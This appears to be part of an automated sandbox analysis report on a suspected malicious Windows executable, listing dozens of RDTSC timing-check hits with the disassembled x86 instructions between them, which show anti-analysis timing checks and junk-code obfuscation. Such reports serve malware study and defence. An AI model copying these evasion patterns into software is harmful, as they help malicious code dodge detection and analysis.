Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77DD1D second address: 77DD38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F63C8D82F53h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77DEB3 second address: 77DEED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F63C8B57C16h 0x0000000a popad 0x0000000b jmp 00007F63C8B57C26h 0x00000010 jnp 00007F63C8B57C1Eh 0x00000016 je 00007F63C8B57C16h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 push eax 0x00000022 push edx 0x00000023 ja 00007F63C8B57C16h 0x00000029 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77DEED second address: 77DEFB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 jnc 00007F63C8D82F46h 0x0000000d pop ecx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E072 second address: 77E092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F63C8B57C29h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E092 second address: 77E0AC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F63C8D82F52h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E532 second address: 77E536 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E536 second address: 77E549 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F63C8D82F4Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77E686 second address: 77E6A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C28h 0x00000009 pop ecx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 780CE8 second address: 780CEE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 780E68 second address: 780E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7817AB second address: 7817C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jbe 00007F63C8D82F58h 0x0000000d push eax 0x0000000e push edx 0x0000000f jl 00007F63C8D82F46h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7817C0 second address: 7817C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7819A1 second address: 7819B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8D82F4Dh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 781ABA second address: 781B0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F63C8B57C26h 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F63C8B57C18h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 push edi 0x00000026 pop esi 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a pushad 0x0000002b ja 00007F63C8B57C16h 0x00000031 jbe 00007F63C8B57C16h 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78203F second address: 782043 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 782AC5 second address: 782AC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78292A second address: 78292F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7839CB second address: 783A0F instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F63C8B57C1Ch 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d push eax 0x0000000e mov dword ptr [ebp+12455516h], ecx 0x00000014 pop esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push edi 0x0000001a call 00007F63C8B57C18h 0x0000001f pop edi 0x00000020 mov dword ptr [esp+04h], edi 0x00000024 add dword ptr [esp+04h], 00000015h 0x0000002c inc edi 0x0000002d push edi 0x0000002e ret 0x0000002f pop edi 0x00000030 ret 0x00000031 push 00000000h 0x00000033 cld 0x00000034 xchg eax, ebx 0x00000035 push eax 0x00000036 push edx 0x00000037 push ecx 0x00000038 push eax 0x00000039 pop eax 0x0000003a pop ecx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7874DE second address: 7874E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78A04A second address: 78A04E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78AE5E second address: 78AE6B instructions: 0x00000000 rdtsc 0x00000002 je 00007F63C8D82F46h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78DCE3 second address: 78DCE8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78DCE8 second address: 78DCEF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78DCEF second address: 78DD00 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jnc 00007F63C8B57C16h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78EDCF second address: 78EDD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78EDD4 second address: 78EDEF instructions: 0x00000000 rdtsc 0x00000002 jno 00007F63C8B57C18h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b jo 00007F63C8B57C22h 0x00000011 jp 00007F63C8B57C1Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78AFE2 second address: 78AFF2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edi 0x0000000c push eax 0x0000000d push edx 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78EDEF second address: 78EE2E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 nop 0x00000005 cmc 0x00000006 push 00000000h 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007F63C8B57C18h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 push 00000000h 0x00000024 sub dword ptr [ebp+122D34F4h], eax 0x0000002a push eax 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e pushad 0x0000002f popad 0x00000030 je 00007F63C8B57C16h 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78AFF2 second address: 78B099 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a nop 0x0000000b mov edi, dword ptr [ebp+122D2983h] 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F63C8D82F48h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 xor dword ptr [ebp+122D2F17h], eax 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f push 00000000h 0x00000041 push ebp 0x00000042 call 00007F63C8D82F48h 0x00000047 pop ebp 0x00000048 mov dword ptr [esp+04h], ebp 0x0000004c add dword ptr [esp+04h], 0000001Ah 0x00000054 inc ebp 0x00000055 push ebp 0x00000056 ret 0x00000057 pop ebp 0x00000058 ret 0x00000059 add ebx, 6C625027h 0x0000005f mov eax, dword ptr [ebp+122D0385h] 0x00000065 pushad 0x00000066 sub dword ptr [ebp+122D35F3h], esi 0x0000006c xor esi, dword ptr [ebp+122D2E7Ch] 0x00000072 popad 0x00000073 push FFFFFFFFh 0x00000075 jmp 00007F63C8D82F54h 0x0000007a nop 0x0000007b jo 00007F63C8D82F4Eh 0x00000081 push ebx 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 78EF35 second address: 78EF4A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push esi 0x00000007 pop esi 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b jnp 00007F63C8B57C20h 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 791D14 second address: 791D18 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790F01 second address: 790FA0 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F63C8B57C16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c push 00000000h 0x0000000e push edi 0x0000000f call 00007F63C8B57C18h 0x00000014 pop edi 0x00000015 mov dword ptr [esp+04h], edi 0x00000019 add dword ptr [esp+04h], 00000018h 0x00000021 inc edi 0x00000022 push edi 0x00000023 ret 0x00000024 pop edi 0x00000025 ret 0x00000026 push dword ptr fs:[00000000h] 0x0000002d push 00000000h 0x0000002f push edi 0x00000030 call 00007F63C8B57C18h 0x00000035 pop edi 0x00000036 mov dword ptr [esp+04h], edi 0x0000003a add dword ptr [esp+04h], 0000001Ch 0x00000042 inc edi 0x00000043 push edi 0x00000044 ret 0x00000045 pop edi 0x00000046 ret 0x00000047 adc di, 4143h 0x0000004c mov edi, dword ptr [ebp+122D226Dh] 0x00000052 and edi, dword ptr [ebp+122D298Bh] 0x00000058 mov dword ptr fs:[00000000h], esp 0x0000005f jmp 00007F63C8B57C22h 0x00000064 mov eax, dword ptr [ebp+122D0175h] 0x0000006a mov dword ptr [ebp+122D374Eh], ecx 0x00000070 push FFFFFFFFh 0x00000072 mov ebx, 132C223Ah 0x00000077 nop 0x00000078 push eax 0x00000079 push edx 0x0000007a push eax 0x0000007b push edx 0x0000007c js 00007F63C8B57C16h 0x00000082 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 791D18 second address: 791D1E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790FA0 second address: 790FA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790FA4 second address: 790FAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 790FAA second address: 790FB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 795CB5 second address: 795CB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 791E32 second address: 791E36 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 795CB9 second address: 795CCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F63C8D82F48h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 793D50 second address: 793D54 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 794EC0 second address: 794EC6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793D54 second address: 793D58 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 793D58 second address: 793D5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 796EA0 second address: 796EB6 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jg 00007F63C8B57C16h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e jl 00007F63C8B57C1Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797C6D second address: 797CDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop esi 0x00000006 mov dword ptr [esp], eax 0x00000009 push 00000000h 0x0000000b push edi 0x0000000c call 00007F63C8D82F48h 0x00000011 pop edi 0x00000012 mov dword ptr [esp+04h], edi 0x00000016 add dword ptr [esp+04h], 0000001Dh 0x0000001e inc edi 0x0000001f push edi 0x00000020 ret 0x00000021 pop edi 0x00000022 ret 0x00000023 call 00007F63C8D82F4Dh 0x00000028 mov di, 8517h 0x0000002c pop ebx 0x0000002d push 00000000h 0x0000002f jmp 00007F63C8D82F59h 0x00000034 push 00000000h 0x00000036 mov dword ptr [ebp+122D2E4Bh], esi 0x0000003c push eax 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 jbe 00007F63C8D82F46h 0x00000047 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CDB second address: 797CF7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8B57C28h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797CF7 second address: 797D0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F63C8D82F51h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797D0C second address: 797D10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749DF7 second address: 749DFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 797F4D second address: 797F60 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 push ecx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push esi 0x0000000f pop esi 0x00000010 push eax 0x00000011 pop eax 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749DFB second address: 749E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007F63C8D82F46h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 749E06 second address: 749E1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnl 00007F63C8B57C1Ch 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A405 second address: 79A40B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 79A40B second address: 79A415 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F63C8B57C16h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7A3B33 second address: 7A3B37 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB621 second address: 7AB625 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB625 second address: 7AB629 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB629 second address: 7AB633 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AB633 second address: 7AB637 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF90A second address: 7AF913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7AF913 second address: 7AF919 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0505 second address: 7B055A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C23h 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c js 00007F63C8B57C47h 0x00000012 jmp 00007F63C8B57C29h 0x00000017 jmp 00007F63C8B57C28h 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B055A second address: 7B055E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B055E second address: 7B0564 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B06FE second address: 7B0702 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0702 second address: 7B0706 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0706 second address: 7B0726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8D82F4Eh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F63C8D82F4Ah 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0726 second address: 7B072A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B0882 second address: 7B089B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F63C8D82F55h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4D1B second address: 7B4D45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jne 00007F63C8B57C1Eh 0x0000000c jo 00007F63C8B57C16h 0x00000012 pushad 0x00000013 popad 0x00000014 jmp 00007F63C8B57C1Eh 0x00000019 push eax 0x0000001a pushad 0x0000001b popad 0x0000001c pop eax 0x0000001d push eax 0x0000001e push edx 0x0000001f push edx 0x00000020 pop edx 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B4FF0 second address: 7B5003 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 jmp 00007F63C8D82F4Ch 0x0000000b popad 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5003 second address: 7B5008 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B52C1 second address: 7B52C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B559A second address: 7B55B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F63C8B57C1Ah 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007F63C8B57C16h 0x00000012 push eax 0x00000013 pop eax 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B56F5 second address: 7B5726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F63C8D82F56h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F63C8D82F52h 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5726 second address: 7B573B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 jmp 00007F63C8B57C1Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B573B second address: 7B575C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8D82F56h 0x00000008 jnc 00007F63C8D82F46h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B58BE second address: 7B58C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B58C2 second address: 7B58E7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pushad 0x0000000a jmp 00007F63C8D82F57h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7690B9 second address: 7690C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5C7E second address: 7B5C8D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop ecx 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e popad 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5C8D second address: 7B5C92 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7B5C92 second address: 7B5C9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edi 0x00000007 push esi 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77F1AE second address: 77F1C2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F63C8B57C1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
